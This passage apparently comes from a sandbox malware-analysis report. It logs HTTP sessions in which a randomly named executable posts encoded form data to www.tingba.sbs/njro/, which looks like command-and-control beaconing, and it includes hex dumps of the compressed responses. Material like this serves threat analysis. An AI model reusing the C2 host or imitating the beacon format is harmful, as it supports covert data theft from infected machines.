                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 31 6b 65 39 55 61 44 35 4a 33 32 49 78 39 33 4a 70 32 34 4e 75 50 44 34 45 71 70 44 52 31 45 6c 2b 67 6e 6b 56 32 33 4e 2b 6e 62 2f 57 6e 48 47 49 51 4d 50 71 6e 4c 58 42 67 39 73 53 56 58 49 32 4c 78 34 78 58 4d 2f 71 7a 6c 36 77 6e 6b 46 32 2f 5a 34 45 31 58 66 54 69 52 74 77 2f 77 58 63 4c 71 45 66 49 51 31 41 71 74 39 39 42 4c 45 56 6e 68 39 69 4b 2f 30 77 38 4e 65 36 63 62 54 47 4a 6a 33 43 54 50 72 49 7a 35 48 32 61 78 53 45 35 53 55 43 4d 79 7a 6c 51 52 37 37 6f 49 50 74 57 52 42 67 7a 34 5a 56 33 34 55 75 4d 6f 52 4d 34 47 58 36 50 46 6e 2f 2b 4b 73 42 71 39 74 4b 41 44 33 33 64 63 4c 4f 33 78 2b 63 42 72 67 31 67 3d 3d
                                                        Data Ascii: eL-x=1ke9UaD5J32Ix93Jp24NuPD4EqpDR1El+gnkV23N+nb/WnHGIQMPqnLXBg9sSVXI2Lx4xXM/qzl6wnkF2/Z4E1XfTiRtw/wXcLqEfIQ1Aqt99BLEVnh9iK/0w8Ne6cbTGJj3CTPrIz5H2axSE5SUCMyzlQR77oIPtWRBgz4ZV34UuMoRM4GX6PFn/+KsBq9tKAD33dcLO3x+cBrg1g==
                                                        Nov 7, 2024 15:52:07.365489960 CET1236INHTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:52:07 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tHUpsQX9x3oHguQO0T8TUJU5f3QneL2RGR5ss3rp0jVTb8MOcZAOqEjyzjJk%2FRjk2kyIH%2Bmv8SNKIumEZJOEjgNOKza3E1121%2F4RdyqeeoF2aac2QhfOUcxFeiIcwOyyNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8dee252e8b923596-DFW
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1230&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=788&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 61 34 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 54 c9 8e eb 48 76 dd 37 d0 ff 90 ce 86 51 0d 4b 99 9c 45 4a f9 5e 01 a4 38 68 16 25 51 12 a5 1d 87 20 19 22 19 24 83 c1 31 91 9f e0 7d a3 61 2f ec 85 e1 8d 97 36 ec ff e9 5e d4 5f 18 ca cc 57 55 0f dd b0 17 de 3a 36 c1 3b 9f 7b ee 0d 7e f9 1b 75 3b b5 2e a6 f6 10 91 34 f9 f1 b7 bf f9 72 bf 1f da 34 41 e5 d7 c7 88 90 7c 42 51 4d d3 3c 37 dc 73 86 43 8a 19 8f c7 54 7b f7 79 fc f1 4b 04 1c ff 1e 42 20 49 c0 8f 3c cd 53 3f fd d3 bf ff f4 8f ff fc a7 ff fc fb 3f ff db 1f fe fc 0f ff fa 85 fa 30 fd f6 37 5f 52 40 9c 87 7b be 27 50 54 b0 fe fa 38 cd 10 01 88 3c 59 5d 0e 1e 1f bc 0f e9 eb 23 01 2d a1 ee f9 5f 1e bc c8 c1 25 20 5f 2b 12 3c 49 8f 7f 35 09 06 01 06 65 f4 4b fc 0f c2 cb 43 85 93 af d4 0f 77 ff 92 74 ef d5 dd cc ef 86 3e ac 87 7e 32 f4 c9 d0 f7 87 55 32 cc 92 61 02 87 11 33 8c d8 61 c4 0d 23 7e 18 09 c3 68 34 cc 31 18 7a 99 0f 86 41 86 d3 e1 1d 8f 83 81 33 2c 41 02 3c 32 cc 72 12 e2 ac ca ef 1f 30 43 c3 00 82 c4 2f 01 19 26 20 04 c8 1f e6 43 37 c9 [TRUNCATED]
                                                        Data Ascii: a44THv7QKEJ^8h%Q "$1}a/6^_WU:6;{~u;.4r4A|BQM<7sCT{yKB I<S??07_R@{'PT8<Y]#-_% _+<I5eKCwt>~2U2a3a#~h41zA3,A<2r0C/& C72$5up~(o?G4|u3<wDY<d<%7o
                                                        Nov 7, 2024 15:52:07.365623951 CET212INData Raw: 4d 7c 64 0b 9c 14 26 dd 04 a2 08 60 48 5e 7e a9 f0 bd e6 1d d5 77 aa 06 c0 30 22 df 74 df 57 fe 28 f8 0b 05 7f f7 3d f0 97 04 22 f0 14 7d 24 60 9e d9 37 e7 01 a6 e1 3b 2b 4f 69 f9 04 11 01 38 cf 12 e7 8e f2 29 cd 7c 30 71 a1 57 b9 d0 7b bb 8f f4
                                                        Data Ascii: M|d&`H^~w0"tW(="}$`7;+Oi8)|0qW{u'uro^?t&QV<t&G`$+|F7z$qL}|>| b%;>,&{7>gyK1q,u
                                                        Nov 7, 2024 15:52:07.365634918 CET1236INData Raw: 86 4e 32 7c fc e9 8f ff f1 a7 ff fa 97 c7 97 4f f4 a3 d1 e8 ed d9 03 77 d6 5e df bb 70 12 18 a2 c9 87 e6 ed d9 4b 80 83 27 4e 40 00 1e 7e 08 01 6c 3f e4 d7 cf 07 34 79 7c 7e 7c f9 0e e1 cb 47 94 9b 91 e8 a5 86 25 74 61 02 49 37 89 a0 ef 03 f4 ab
                                                        Data Ascii: N2|Ow^pK'N@~l?4y|~|G%taI7-_>H7T/_,K';$yVw)A9di5&y{g_m':f~w|"Y>a$6o7?|&L~^"K}Mxqa}2#:oLjU+!N/S
                                                        Nov 7, 2024 15:52:07.366060019 CET1236INData Raw: 24 ca bb 33 cc 61 b5 e6 ad 53 06 ad d5 72 a9 d5 2d a3 67 be b1 65 19 77 c0 ce 39 6f e5 b8 ba 5e 04 0a 1b cf 7d a6 52 64 4d 41 6e 34 96 57 b1 af 15 c7 9a a2 3d 28 2d 34 fa 54 e6 85 ad c9 de b2 58 0a 37 e8 ba dc c9 c6 6d 2f f6 48 40 dc 66 2b e5 23
                                                        Data Ascii: $3aSr-gew9o^}RdMAn4W=(-4TX7m/H@f+#R1X!$@9r6?cOoS,9X"9w9V`vN+TS^)vgC3wP\k7AHqDsty~xGiY9nHrD3*
                                                        Nov 7, 2024 15:52:07.366072893 CET1236INData Raw: f2 b2 d0 e3 f2 b4 92 e5 bc 0f c7 16 d0 a9 0f f4 7d e4 b2 53 af 2c 19 02 6c 9a 3d 30 fc ae eb 3d 43 fa 40 b7 7b b4 3f 10 6c ee 92 94 73 1a df 91 b7 a0 d3 76 44 50 bc 64 9a 64 7d 64 47 ea d8 2e 41 d6 ef e0 fd 16 03 96 87 ce bb 82 11 67 59 ca 76 24
                                                        Data Ascii: }S,l=0=C@{?lsvDPdd}dG.AgYv$X2zks"BOT6;EAcDvD88^$'j+: qV+ pO/CJ?:/;3o}UjN>dh]n(
                                                        Nov 7, 2024 15:52:07.366951942 CET1236INData Raw: 8c 4e 2e b5 11 aa c7 8e d1 b5 49 b4 e4 bf 3e 18 b9 2e 08 a2 bd 4c be 91 64 82 8d b0 61 c3 d3 ea a2 49 16 77 48 8c 7d ca ef ec 0a 1f d5 69 bb d3 57 7e 09 b3 30 67 17 51 d8 d4 4a 0b 01 ad 07 a7 77 92 51 85 85 be 77 90 c3 93 0e 97 72 82 44 af ef c8
                                                        Data Ascii: N.I>.LdaIwH}iW~0gQJwQwrDWL0+]ec3S2zzN7kTv{3#T]jaF&CI0r*\W?=-%@6a\[#e6r~[bK{w!3e7Bs]L_cG
                                                        Nov 7, 2024 15:52:07.366966009 CET1236INData Raw: 15 02 cb 63 8f ed a4 ab 7b 70 5e f7 e0 dc bb fb fd 4b 47 22 22 b0 23 00 c8 28 68 a7 28 5b d6 c8 1c 68 19 8e 42 9a c8 5c 80 df 81 33 0c 45 da 25 85 db 81 43 73 7a e0 41 2e 87 8b 53 75 ad a2 15 ab 4c f2 f1 24 dc 6d 6a 78 bb 8d e0 61 3c 57 e3 aa 41
                                                        Data Ascii: c{p^KG""#(h([hB\3E%CszA.SuL$mjxa<WAf~T;M{q-|Cg33{97BCn,|J]HR0ih1*bY@t&W87Azx6Nd.3i1vH8FQ8k2q;^j,|:M,H,sD.
                                                        Nov 7, 2024 15:52:07.366976976 CET132INData Raw: 3e 3a fd f0 cb d3 47 4f ce 3f ff f3 f1 b3 87 ff 7b f7 bd 3b 29 c8 db e7 4f fe 7b fa f8 ef 67 2f 3e 38 7e f6 f0 f8 c5 5f cf fe f5 cf d3 bf 7c 7b 3b f1 e6 1a 6e 0d 95 e5 5e 71 6b 24 fc e5 3f 3e 3b f9 f4 f1 d9 8b cf 4f be fe e6 fc fb 2f cf ff f6 ef
                                                        Data Ascii: >:GO?{;)O{g/>8~_|{;n^qk$?>;O/7Kus{?Rb&0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.1050000172.67.202.10806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:52:08.832688093 CET1801OUTPOST /njro/ HTTP/1.1
                                                        Host: www.tingba.sbs
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.tingba.sbs
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 1229
                                                        Referer: http://www.tingba.sbs/njro/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 31 6b 65 39 55 61 44 35 4a 33 32 49 78 39 33 4a 70 32 34 4e 75 50 44 34 45 71 70 44 52 31 45 6c 2b 67 6e 6b 56 32 33 4e 2b 6e 54 2f 56 52 37 47 4f 33 51 50 72 6e 4c 58 43 67 39 76 53 56 58 76 32 4c 35 38 78 58 41 42 71 78 4e 36 78 46 73 46 77 4f 5a 34 4e 31 58 66 52 69 51 4b 30 2f 77 6e 63 4c 37 4e 66 49 67 31 41 71 74 39 39 44 44 45 42 6a 39 39 76 71 2f 33 35 63 4e 73 74 4d 61 32 47 50 4b 41 43 51 6a 37 55 54 5a 48 32 36 68 53 47 4b 36 55 4f 4d 79 31 6b 51 52 6a 37 6f 55 71 74 57 4d 34 67 79 4e 32 56 77 38 55 73 6f 46 35 51 70 65 66 6f 76 46 4d 30 50 32 72 50 71 70 6a 43 42 79 78 2f 64 59 54 51 56 51 42 66 51 62 75 67 65 7a 4e 59 4a 6e 6d 42 69 6d 6a 78 4e 4f 66 63 59 2f 4e 72 55 6d 76 2b 79 2b 73 67 6f 70 31 45 44 67 50 35 61 69 48 41 48 63 35 32 6c 35 65 32 55 2f 2f 44 4e 6b 51 37 61 52 4c 33 43 6d 45 33 4c 67 43 49 41 73 31 38 75 5a 4f 76 2f 41 79 54 6a 4b 4f 68 6a 56 54 6f 47 6c 65 51 74 5a 70 78 30 36 57 79 46 6f 77 41 6e 67 77 39 66 4e 33 31 45 4c 4b 7a 53 6f 41 70 30 6a 45 57 [TRUNCATED]
                                                        Data Ascii: eL-x=1ke9UaD5J32Ix93Jp24NuPD4EqpDR1El+gnkV23N+nT/VR7GO3QPrnLXCg9vSVXv2L58xXABqxN6xFsFwOZ4N1XfRiQK0/wncL7NfIg1Aqt99DDEBj99vq/35cNstMa2GPKACQj7UTZH26hSGK6UOMy1kQRj7oUqtWM4gyN2Vw8UsoF5QpefovFM0P2rPqpjCByx/dYTQVQBfQbugezNYJnmBimjxNOfcY/NrUmv+y+sgop1EDgP5aiHAHc52l5e2U//DNkQ7aRL3CmE3LgCIAs18uZOv/AyTjKOhjVToGleQtZpx06WyFowAngw9fN31ELKzSoAp0jEWOeWepNIZDB1Jyq+tJ3ziL45N91AiPIdwvckcZKs15SOXqHofaGW2XHPCZP6VifIjPzg0OBLFsbTdoMQLOg7yS6kRje4twhSw+h8k4WeY8MqBZZUzb2ddDP6GYQYjHkJ/bAMLkRFqTUT4mBdtaJus+PfJKCOfe2JTno5nobrN539bbBo023LVsSSVOKrxLrf6R4sOBPlF7A6/BVOVhuSc1YtZmFK6leosqkZ6x3I+YT+oXxcnxHoumj1aRIX5H8VQ1/husHsZNvdB4VA+a4ZnHVLAbDV3cvoby53/IHLabb18k/EPgf30gXFc3CjT+hmuMVHCBAQR7AxEtBVDyIFazEMhBcs4JF771I54DjZC5cPTbuFHgjtA91tMzcFWJ8b1rFyp435y3WHaODG+ltiqaImPmTKHD86mCewDJE9UiGuprmuN03dyYM2QhROKXYNSl9Yag4WAVjdjQmm+FGe4HG7GcjbzfXFT/bQ+z7OasI6Ki8xONoxM6XBo3QEQ5hlSK2QrU44wXxaQVXJjn161kfhv77PZMthuPOcUYa8IDBVCrjkB6MwU66o9jZXP9jH3OwiwZEHI1Ruy/60bDuRjEqEmK3nmK/88uDG/tVjtOUeSmQfS5kbnA4wNMV3hcth9fOFIuNRM32meo+1/pRFBHHHClgz9GJ0QiV [TRUNCATED]
                                                        Nov 7, 2024 15:52:09.870068073 CET1236INHTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:52:09 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wx%2B6ht8u4hyiYbYz3k9Gm3SlEEsO2%2FCDfAMBI97WHASOPFRYcQxbkiGdHcpEj%2BciGKcL7cuel%2BUEboyIuf7qqgbRoh6Hk%2FiY5QPdsg14xk7T0HobDBEStrLyR7aX%2FMZxiw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8dee253e7e1f6b2f-DFW
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1187&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1801&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 36 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 84 53 cb 6e db 46 14 dd 07 c8 3f a8 0a 8a 04 cd 50 24 45 3d 2c d2 0e 20 4b 96 e3 58 b6 94 58 72 d2 ec 86 e4 25 39 f6 70 66 34 1c ea 41 81 9f d0 7d 51 b4 8b 76 51 74 d3 65 8b f6 7f 92 45 fe a2 20 29 c7 16 52 b4 ab 99 b9 af 73 ee b9 77 0e bf 1a 4e 06 b3 6f a7 27 b5 48 c5 f4 c5 e3 47 87 c5 59 5b c7 94 25 47 f5 48 29 61 eb fa 6a b5 6a ac ac 06 97 a1 6e f6 7a 3d 7d 5d c4 d4 5f 1c 46 80 fd 22 45 11 45 e1 45 cb 68 e9 9f 7e fe e3 d3 4f bf 7c f8 eb bb 8f bf 7f ff f1 c7 df 0e f5 ca f5 f8 d1 61 0c 0a d7 8a 7a 1a 2c 52 b2 3c aa 0f 38 53 c0 94 36 db 08 a8 d7 bc ea 75 54 57 b0 56 7a 51 df a9 79 11 96 09 a8 a3 54 05 da 41 fd 5f 8b 48 08 24 24 d1 7d fe d3 b6 53 4b 25 3d d2 9f 16 f1 89 da 94 e8 2e f7 37 c8 27 4b e4 53 e4 2b e4 fb 28 a5 88 53 44 09 8a 4c 14 35 51 64 a1 a8 85 a2 36 8a 3a 48 48 40 1e f7 01 05 5c c6 a8 e0 83 25 60 94 00 05 4f 21 2e 54 28 79 2a 8a 0b e1 0c 05 04 a8 9f 80 42 14 42 60 3e 12 c8 a5 dc bb 5d a4 5c 01 52 11 52 fe 36 c6 32 24 cc 36 1c 81 7d 9f b0 d0 [TRUNCATED]
                                                        Data Ascii: 461SnF?P$E=, KXXr%9pf4A}QvQteE )RswNo'HGY[%GH)ajjnz=}]_F"EEEh~O|az,R<8S6uTWVzQyTA_H$$}SK%=.7'KS+(SDL5Qd6:HH@\%`O!.T(y*BB`>]\RR62$6}6Y$.>H[Jm_)-!a|W[S.'aT!7UkMX(aR3
                                                        Nov 7, 2024 15:52:09.870471001 CET1236INData Raw: 84 91 ba b3 ed 23 57 80 f7 12 7c b3 4f dc a1 84 81 16 55 05 cc 46 33 c7 35 12 87 a5 2a 5a 9c 68 84 29 90 82 53 5c b0 d4 62 ee 83 ed 12 2f 75 89 97 17 23 dd ba d8 bb 2d 1a 61 be fd 64 34 1a e5 f8 b3 02 1d cf 29 9a d6 7c f0 b8 2c d3 2b 25 b1 1d f1
                                                        Data Ascii: #W|OUF35*Zh)S\b/u#-ad4)|,+%%Hm){i_)ADs]yis${R%WDP=)Rn7Xf]S81FXLQ~ctjLI7<X8P Qzow7Cr%IK(Q;"
                                                        Nov 7, 2024 15:52:09.870486021 CET1236INData Raw: a0 68 49 5f e4 82 2b 1b 86 a1 7d a8 93 af 9a 9e ad 72 d6 68 aa 53 34 63 4d bf d8 7b 7f 2d 04 cf 61 23 c6 82 80 6d 98 f6 24 8f 36 be e5 b9 76 af 8f 1f 11 fc 5e d9 8b 12 f1 e8 5a 45 b2 03 00 38 a0 b8 9e df db f0 7f f8 ff 00 ff 62 1a 6e 00 c9 f6 f7
                                                        Data Ascii: hI_+}rhS4cM{-a#m$6v^ZE8bn<XQ/?>9:l`%?w^aRH]<Rajs>xkpB^^tBu,'Q{lkItiDS&7*Mlaha<LO
                                                        Nov 7, 2024 15:52:09.870893002 CET1236INData Raw: e1 43 d3 5a 19 6b 1c f1 e0 40 b2 1a 40 5d af dc 49 ed 32 67 67 f6 98 e9 f7 23 d1 27 b6 fe 74 cf fe 83 b3 a3 79 95 d1 ba 1d f9 f2 d1 43 a4 0e de 97 d4 d4 bb b7 bc 92 58 4e f6 76 76 d9 9a 79 d1 46 13 1a 1c b3 f6 a7 24 41 72 49 d5 e6 0d 6d 05 93 1d
                                                        Data Ascii: CZk@@]I2gg#'tyCXNvvyF$ArImZb+D)g]~)(Fe_y>qSmdn8c9'}&C(Vr]d/=ofy>Gz%7)o3`8Y_#\`~C@mIsD)\Bal
                                                        Nov 7, 2024 15:52:09.870907068 CET848INData Raw: 5d 19 38 2e 00 55 7b 75 b4 0a de 86 8f b9 e7 bd 87 27 ad af 30 9b 0b 6f 01 91 13 bb ed 5f 23 be f0 e2 a7 98 37 3f 85 35 02 77 6c 2d 3f 14 22 16 07 f9 c8 f2 39 ec dc 13 82 0a 9e da 2b 81 79 a8 d3 db 78 a7 59 3c 8d 50 e0 be 8c ba af 24 3d cc c2 28
                                                        Data Ascii: ]8.U{u'0o_#7?5wl-?"9+yxY<P$=(!8$dzM,L%~o=rV5xYX9p_[5W}?uU/gVO(d:X}F[(]Lk]/xwdpM7>w~Ev_YrbQi
                                                        Nov 7, 2024 15:52:09.871692896 CET1236INData Raw: 6a 1f 6b 2a 67 8f c2 a3 3f 93 3f 6c fa e4 0a 5a 9d 9f a4 6d 9a 69 26 b4 c0 f6 66 07 f5 d5 1b d1 ac e5 d7 35 94 f6 69 42 a7 ba 3f f3 28 0b f5 2e 58 76 81 49 61 dd df 19 d1 1f 72 2b 7d bb 6b bb 83 86 d2 54 64 4c 38 d4 53 91 da 6c 6a 8b 8d 5c 5d fe
                                                        Data Ascii: jk*g??lZmi&f5iB?(.XvIar+}kTdL8Slj\]]m[`s'Coyr/..g^.}Upr>h7i.-=np|brY>{6zU)\JkN(L;>!gw'=kX]LS
                                                        Nov 7, 2024 15:52:09.872524023 CET691INData Raw: d0 ae d9 70 c4 91 26 27 0c 9d 14 86 53 39 c2 fc a2 34 8b cd 44 92 9d ad 39 20 a6 ec 64 de f8 c2 54 8a f1 54 ca 16 4a 97 41 0e da e8 62 5d 6f 14 4b f0 59 51 58 01 16 bb 36 70 33 9b 84 a8 cf 11 46 06 8f c1 54 2c 26 72 61 ad 5b 7e 59 20 a5 d9 88 fa
                                                        Data Ascii: p&'S94D9 dTTJAb]oKYQX6p3FT,&ra[~Y %rozV! \19,<:m2r@b)n+B#p;zb"vh/:dJBs/&@lC'n9+K]xPY@AE^2?@*k9r


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.1050001172.67.202.10806584C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 7, 2024 15:52:11.373037100 CET514OUTGET /njro/?wFVH=-zwTKPF0iPth&eL-x=4m2dXuyzH1K67YjRiF0xgcinYZd6F04lkWHhJhjAgk74IEPWOAVZvwb6DAALc1Sd7YFs2hEz0292kCRHtftOb0bCUTNRw6g5HYfyDosdAoVL7yu4Ug== HTTP/1.1
                                                        Host: www.tingba.sbs
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Nov 7, 2024 15:52:12.409739971 CET1236INHTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:52:12 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3aVldNir6MSLrNhkt4pj0D6kS7J%2FRcfXH209pBJ9lmQ%2F8NMbYI1zs2jcdc%2B0vHj7jtY29lqQlQSxYexdIc6zob3MAhxaFIOPW4b5dQL%2F0A0ryBtl0XF9p3AFbWi%2BaLBvqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8dee254e6821b78c-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2264&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=514&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 31 65 38 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 2f e9 a1 b5 e9 9d a2 e4 b8 8d e5 ad 98 e5 9c a8 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 2f 27 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 62 6f 64 79 2c 64 69 76 2c 64 6c 2c 64 74 2c 64 64 2c 75 6c 2c 6f 6c 2c 6c 69 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 70 72 65 2c 63 6f 64 65 2c 66 6f 72 6d 2c 74 65 78 74 61 72 65 61 2c 73 65 6c 65 63 74 2c 6f 70 74 67 72 6f 75 70 2c 6f 70 74 69 6f 6e 2c 66 69 65 6c 64 73 65 74 2c 6c 65 [TRUNCATED]
                                                        Data Ascii: 1e86<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><title>404/</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="refresh" content='5; url=/'><style>body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,code,form,textarea,select,optgroup,option,fieldset,legend,p,blockquote,th,td{margin:0;padding:0}fieldset,img{border:0}ul,li,ol{list-style:none}h1,h2,h3,h4,h5,h6{fon
                                                        Nov 7, 2024 15:52:12.409813881 CET1236INData Raw: 74 2d 73 69 7a 65 3a 31 30 30 25 7d 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 30 30 30 7d 69 6e 70 75 74 2c 62 75 74 74 6f 6e 2c 74 65 78 74 61 72 65 61 2c 73 65 6c 65 63 74 2c 6f 70 74 67 72 6f 75 70 2c 6f 70 74 69 6f 6e 7b 66 6f 6e 74 2d 66 61
                                                        Data Ascii: t-size:100%}legend{color:#000}input,button,textarea,select,optgroup,option{font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit}input,button,select{margin:0;*font-size:100%;line-height:1.2}a img,img{-ms-interpolation-mo
                                                        Nov 7, 2024 15:52:12.409852028 CET1236INData Raw: 56 42 37 49 73 46 32 31 63 79 2b 6c 69 6c 7a 4e 76 37 66 33 37 70 33 65 31 4d 2b 4c 61 30 31 7a 53 69 6e 73 39 50 72 71 71 6f 33 36 38 4c 32 34 6e 6e 58 77 30 7a 66 32 37 4a 54 77 35 49 7a 6d 31 34 58 48 71 46 66 4b 64 43 66 4e 34 76 50 77 37 4f
                                                        Data Ascii: VB7IsF21cy+lilzNv7f37p3e1M+La01zSins9Prqqo368L24nnXw0zf27JTw5Izm14XHqFfKdCfN4vPw7On5/P7JtnLvx5GpWBy1nGPu235/QxmFuuOmaifaulvm1HzmzW7NvZJkOCF9WDPfzXrXz8ymj4SBXUiv0uykhkfe3Nqsi0m+qZn587X40s73362Rc2OchHT26ZaSwOakjXr0wEbe6fHEdCi4nlnLuH6ym4jlxm7znju
                                                        Nov 7, 2024 15:52:12.410378933 CET1236INData Raw: 41 42 5a 30 52 56 68 30 51 33 4a 6c 59 58 52 70 62 32 34 67 56 47 6c 74 5a 51 41 78 4d 53 38 77 4e 69 38 78 4d 39 46 35 30 32 30 41 41 41 41 63 64 45 56 59 64 46 4e 76 5a 6e 52 33 59 58 4a 6c 41 45 46 6b 62 32 4a 6c 49 45 5a 70 63 6d 56 33 62 33
                                                        Data Ascii: ABZ0RVh0Q3JlYXRpb24gVGltZQAxMS8wNi8xM9F5020AAAAcdEVYdFNvZnR3YXJlAEFkb2JlIEZpcmV3b3JrcyBDUzVxteM2AAARmElEQVR4nL2cD1xT57nH38PoXdkNjg28YLFSV7AQWipiuM4TVoiTLKKEvx1FodGO21b+2I3cLabFFqfB2kId1uBAEBnbh9ALkdEqUv/0ci8JE0VspqXEAcKqK5jibb3VXrxz7zn5n3NO8p6
                                                        Nov 7, 2024 15:52:12.410394907 CET848INData Raw: 78 63 59 43 36 63 64 69 73 64 41 6a 48 79 53 45 52 74 51 32 63 37 75 4b 46 35 4d 6d 56 66 67 53 73 64 69 54 67 36 31 75 7a 6a 38 4a 43 74 79 4e 66 67 37 71 39 67 32 67 68 63 2b 7a 67 30 6d 74 79 73 39 2f 58 46 44 75 65 56 5a 46 79 4e 6e 55 58 41
                                                        Data Ascii: xcYC6cdisdAjHySERtQ2c7uKF5MmVfgSsdiTg61uzj8JCtyNfg7q9g2ghc+zg0mtys9/XFDueVZFyNnUXAFFPJIPxcFWwi/K1O6mLFYZL/sEsFpN8LnPMDZVnfz8+un0L95YqW30fObnfALopz0gRnVw0rnLU9XamcIbS786AyY8nTm+6/c+ANwJisSoDk7l9RlSAChXiEqePJMu3eqBb3escwtOgCmKDoIPKYLPvUgcMaEqJCK
                                                        Nov 7, 2024 15:52:12.411174059 CET1236INData Raw: 4a 53 43 64 41 51 2f 6c 75 48 6a 46 34 47 65 32 34 56 44 64 6c 30 54 58 65 2f 2f 6e 57 79 44 64 6a 78 30 50 79 53 63 43 70 57 75 64 30 31 71 45 32 63 50 74 76 2f 55 4b 55 45 4e 6a 51 4f 47 41 36 38 53 33 52 4d 4f 7a 58 72 71 31 74 66 56 35 56 7a
